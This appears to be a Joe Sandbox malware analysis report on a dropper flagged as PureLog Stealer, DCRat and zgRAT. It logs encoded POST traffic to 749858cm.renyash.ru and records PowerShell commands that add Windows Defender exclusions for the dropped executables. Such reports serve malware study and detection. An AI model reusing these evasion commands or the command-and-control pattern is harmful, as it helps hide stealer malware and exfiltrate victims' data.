Dec 17, 2024 00:09:10.855220079 CET	792	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4s1mqlufrIVQX0SO1%2FfGEwQVc6Uy6vtzpGj2JGjIYs0a1GgkNs6ihN6K9xpzrHaeClJ1q65oua7S2Q3bDNvoV6ufQN2oV6Crwsy6JNsOUj2uaeJizNoSFb99C7Gvh8JvcQ4vyFLW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256ec5e734273-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3380&min_rtt=1767&rtt_var=3889&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=99509&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:09:11.046778917 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49970	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:11.306108952 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:11.663836002 CET	1060	OUT	Data Raw: 5d 57 43 56 5c 58 54 53 5d 5a 59 53 57 5a 5a 5e 5a 5f 5f 58 51 53 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WCV\XTS]ZYSWZZ^Z__XQSRH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+/U?>;^3 _3[,#^.'\(3S$"T-Z"7<8"F"#Y
Dec 17, 2024 00:09:11.978326082 CET	1060	OUT	Data Raw: 5d 57 43 56 5c 58 54 53 5d 5a 59 53 57 5a 5a 5e 5a 5f 5f 58 51 53 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WCV\XTS]ZYSWZZ^Z__XQSRH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+/U?>;^3 _3[,#^.'\(3S$"T-Z"7<8"F"#Y
Dec 17, 2024 00:09:12.392462015 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:12.653157949 CET	803	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4VbPLqi%2BP7cT3Vut%2BftM5ZSO8tEih8ZJufXlvxIYYU%2BGaM3FU8SrIC9JuSPA3B684FsNO%2BWEs4A3n7N0xrGdG2CCjD18uxL74J8ogbGy7ka1jUIaUiFhCPWjl4DstWMcdcquyIM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256f77f1b42bf-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3793&min_rtt=1789&rtt_var=4679&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=81921&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49972	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:12.963829041 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:13.320231915 CET	1060	OUT	Data Raw: 58 54 46 56 5c 58 51 5f 5d 5a 59 53 57 53 5a 51 5a 54 5f 5e 51 5e 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XTFV\XQ_]ZYSWSZQZT_^Q^RB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y X(/V)?_0$X0-")?9:3<;4&1:): 3>"F"#Y
Dec 17, 2024 00:09:14.061630964 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49977	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:14.240751982 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:14.585773945 CET	1936	OUT	Data Raw: 5d 55 46 57 59 5a 54 5e 5d 5a 59 53 57 52 5a 50 5a 55 5f 55 51 5d 52 45 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]UFWYZT^]ZYSWRZPZU_UQ]RE]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Z(?=>;'$Y%= #:-]<(3S&)>%_"7X("F"#Y
Dec 17, 2024 00:09:15.328808069 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:15.561702967 CET	956	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIJUMaxu%2BBv0fJD%2FLmmB2AzmKdqIbyiyUevdxdh7cMu7dceWfR1YOEpY6T9lSYwLmruClumTEljRQyw%2B1hxC5puzp2%2B6vH1W5I51xExi6XVOelcwaC5NGzPgQFRi9LeO%2FZ76%2Bphk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325709dccb4375-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3940&min_rtt=1842&rtt_var=4888&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=78355&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 1f 27 04 21 02 23 3e 3f 52 2a 59 38 56 27 33 08 00 2f 11 23 19 31 23 08 1e 26 1c 21 1d 24 34 09 5c 34 57 2b 0e 30 31 2b 0c 31 27 23 5d 01 1b 27 44 27 3e 04 1b 29 2f 26 13 27 20 04 0a 32 3d 2b 45 26 42 28 1e 31 0d 09 57 22 3b 3d 02 38 1c 29 03 3c 2f 33 15 2c 23 2d 12 37 14 21 52 0d 13 21 09 27 16 32 5a 27 1f 11 11 23 20 27 5b 22 42 28 0b 33 3f 38 0d 32 3a 27 03 25 3f 2d 01 32 28 23 15 3e 38 21 0c 22 31 2c 10 2a 3e 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 989'!#>?RY8V'3/#1#&!$4\4W+01+1'#]'D'>)/&' 2=+E&B(1W";=8)</3,#-7!R!'2Z'# '["B(3?82:'%?-2(#>8!"1,> R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49978	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:14.361531973 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:15.447830915 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:22.452569008 CET	1060	OUT	Data Raw: 58 52 43 56 59 5e 51 5a 5d 5a 59 53 57 5f 5a 52 5a 57 5f 58 51 52 52 49 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRCVY^QZ]ZYSW_ZRZW_XQRRI]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+5.0$#$'.0#,*<3%.)-:#4$(("F"#Y 4
Dec 17, 2024 00:09:23.020773888 CET	799	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lh0Pz%2BIazPaX6e1nd%2F5WaIbzAXgzUbPJ2Zgm0MXU6WRUfOxVi1tDSxoyesauKyjqEbiC1O8eymca2ibNZmNVcNLCDHxG7yJdiVptybHen2vROnqLQvj6LxxBW0ZlOTUqUpR8hdoO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32570a9f61726e-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4824&min_rtt=1989&rtt_var=6416&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=59178&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Target ID:	0
Start time:	18:07:07
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\gkcQYEdJSO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gkcQYEdJSO.exe"
Imagebase:	0xdc0000
File size:	2'283'768 bytes
MD5 hash:	B5A1474FCB8F7B9809D52546BD304AF3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1757730379.0000000006D62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1756904306.0000000006465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:07:08
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe"
Imagebase:	0xf20000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:07:31
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Bridgecontainerserver\SlMo.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:07:31
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:07:31
Start date:	16/12/2024
Path:	C:\Bridgecontainerserver\BrokerhostNet.exe
Wow64 process (32bit):	false
Commandline:	"C:\Bridgecontainerserver/BrokerhostNet.exe"
Imagebase:	0x760000
File size:	1'961'984 bytes
MD5 hash:	0F91548CA49C64D6A8CD3846854F484C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000000.1996952451.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.2033284427.0000000012E07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Bridgecontainerserver\BrokerhostNet.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgecontainerserver\BrokerhostNet.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat"
Imagebase:	0x7ff62c780000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:07:34
Start date:	16/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff65ada0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:07:35
Start date:	16/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff674580000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:07:35
Start date:	16/12/2024
Path:	C:\Bridgecontainerserver\BrokerhostNet.exe
Wow64 process (32bit):	false
Commandline:	C:\Bridgecontainerserver\BrokerhostNet.exe
Imagebase:	0xe20000
File size:	1'961'984 bytes
MD5 hash:	0F91548CA49C64D6A8CD3846854F484C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:07:35
Start date:	16/12/2024
Path:	C:\Bridgecontainerserver\BrokerhostNet.exe
Wow64 process (32bit):	false
Commandline:	C:\Bridgecontainerserver\BrokerhostNet.exe
Imagebase:	0x830000
File size:	1'961'984 bytes
MD5 hash:	0F91548CA49C64D6A8CD3846854F484C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:07:35
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Imagebase:	0x5d0000
File size:	1'961'984 bytes
MD5 hash:	0F91548CA49C64D6A8CD3846854F484C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	18:07:35
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Imagebase:	0xe90000
File size:	1'961'984 bytes
MD5 hash:	0F91548CA49C64D6A8CD3846854F484C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:07:38
Start date:	16/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	18:07:44
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"
Imagebase:	0x180000
File size:	1'961'984 bytes
MD5 hash:	0F91548CA49C64D6A8CD3846854F484C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:07:49
Start date:	16/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	1503
Total number of Limit Nodes:	45

Executed Functions

Function 00DDDF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DD0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00DD087C
Part of subcall function 00DD0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DD088E
Part of subcall function 00DD0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DD08BF

Part of subcall function 00DDA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DDA655

Part of subcall function 00DDAC16: OleInitialize.OLE32(00000000), ref: 00DDAC2F
Part of subcall function 00DDAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DDAC66
Part of subcall function 00DDAC16: SHGetMalloc.SHELL32(00E08438), ref: 00DDAC70

GetCommandLineW.KERNEL32 ref: 00DDDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00DDDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00DDDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00DDDFCE

Part of subcall function 00DDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DDDBF4
Part of subcall function 00DDDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DDDC30

CloseHandle.KERNEL32(00000000), ref: 00DDDFD7
GetModuleFileNameW.KERNEL32(00000000,00E1EC90,00000800), ref: 00DDDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00E1EC90), ref: 00DDDFFE
GetLocalTime.KERNEL32(?), ref: 00DDE009
_swprintf.LIBCMT ref: 00DDE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00DDE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00DDE061
LoadIconW.USER32(00000000,00000064), ref: 00DDE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00DDE0C9
Sleep.KERNEL32(?), ref: 00DDE0F7
DeleteObject.GDI32 ref: 00DDE130
DeleteObject.GDI32(?), ref: 00DDE140
CloseHandle.KERNEL32 ref: 00DDE183

Strings

C:\Users\user\Desktop, xrefs: 00DDDF33
STARTDLG, xrefs: 00DDE0BE
sfxstime, xrefs: 00DDE055
winrarsfxmappingfile.tmp, xrefs: 00DDDF77
xz, xrefs: 00DDE10B
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00DDE039
sfxname, xrefs: 00DDDFF9

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
API String ID: 3049964643-271953491
Opcode ID: de67a203a869e105715adb3138e3eeab73a03bbb59096b0017e435acc3f336a0
Instruction ID: 1dce66a79512bc6b4bca785ae73eb62c8f01fd0babdb7d9f2bf87d42759ff1b1
Opcode Fuzzy Hash: de67a203a869e105715adb3138e3eeab73a03bbb59096b0017e435acc3f336a0
Instruction Fuzzy Hash: 1361FF71604345AFC320AFB6AC49F7A77A9EB44700F04442BF985A63A1DB749988C7B2

Function 00DDA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00DDB73D,00000066), ref: 00DDA6D5
